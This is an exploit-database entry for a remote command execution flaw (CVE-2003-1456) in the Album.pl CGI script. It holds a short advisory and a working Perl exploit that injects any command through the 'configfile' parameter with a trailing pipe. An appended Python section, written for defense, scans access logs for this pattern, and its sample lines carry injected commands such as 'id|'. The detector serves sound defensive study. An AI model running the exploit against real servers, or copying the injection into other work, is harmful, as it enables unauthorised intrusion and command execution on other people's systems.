Mike Bobbitt Album.PL 0.61 - Remote Command Execution

Author: aresu@bosen.net
type: webapps
platform: cgi
date_added: 2003-04-26 
date_updated: 2012-11-07 
verified: 1 
codes: CVE-2003-1456;OSVDB-41109 

source: https://www.securityfocus.com/bid/7444/info

A remote command execution vulnerability has been reported for Album.pl. The vulnerability reportedly exists when alternate configuration files are used.

The precise technical details of this vulnerability are currently unknown. This BID will be updated as further information is available.

#!/usr/bin/perl -w

use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;
$| = 1;

# Both arguments are required: the album URI and the command string.
if (!$ARGV[0] || !$ARGV[1])
{
	print "\n Usage: perl $0 <album_uri> \"<command>\" \n\n";
	exit;
}

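# Build the request URI: the command, followed by a trailing '|',
# is passed as the value of the configfile parameter.
$command="$ARGV[0]?configfile=$ARGV[1]|";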

my $conn=LWP::UserAgent->new();
my $data=HTTP::Request->new(GET => $command);
my $result=$conn->request($data);
if ($result->is_error())
{
	printf " %s\n", $result->status_line;
}
else
{
	# Print the HTTP status line rather than the stringified response object.
	print "Success: " . $result->status_line . "\n";
}
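
Detection example (added here; not part of the original advisory or of the exploit script): the Python code below scans web server access-log lines for the request shape the script above produces, a configfile parameter whose decoded value contains a pipe character. The log lines are constructed samples, and the function names and the access-log layout are assumptions of this example.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines; addresses, paths and values are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Apr/2003:10:00:01 +0000] "GET /cgi-bin/album.pl?configfile=alt.conf HTTP/1.0" 200 5120',
    '192.0.2.66 - - [26/Apr/2003:10:02:13 +0000] "GET /cgi-bin/album.pl?configfile=id| HTTP/1.0" 200 312',
    '192.0.2.66 - - [26/Apr/2003:10:02:40 +0000] "GET /cgi-bin/album.pl?album=a;configfile=uname%20-a%7C HTTP/1.0" 200 340',
    '192.0.2.11 - - [26/Apr/2003:10:05:00 +0000] "GET /cgi-bin/album.pl?album=holiday|2003 HTTP/1.0" 200 4800',
]

# Request target between the method and the protocol version.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')


def configfile_values(target):
    """Yield the decoded value of every configfile parameter in a request target."""
    _, _, query = target.partition("?")
    # Split on '&' and ';': Perl's CGI.pm accepts both as pair separators,
    # so a detector that only splits on '&' can miss the parameter.
    for pair in re.split(r"[&;]", query):
        name, _, value = pair.partition("=")
        if unquote_plus(name).lower() == "configfile":
            yield unquote_plus(value)


def suspicious_requests(lines):
    """Return (client, configfile value) for requests whose configfile holds a '|'."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a request line this parser understands
        for value in configfile_values(match.group(1)):
            # A configuration file name has no legitimate need for a pipe.
            if "|" in value:
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_requests(SAMPLE_LOG):
        print(f"{client} sent configfile={value!r}")
```

The check only sees what the access log records: a configfile value sent in a POST body would not appear in the request line.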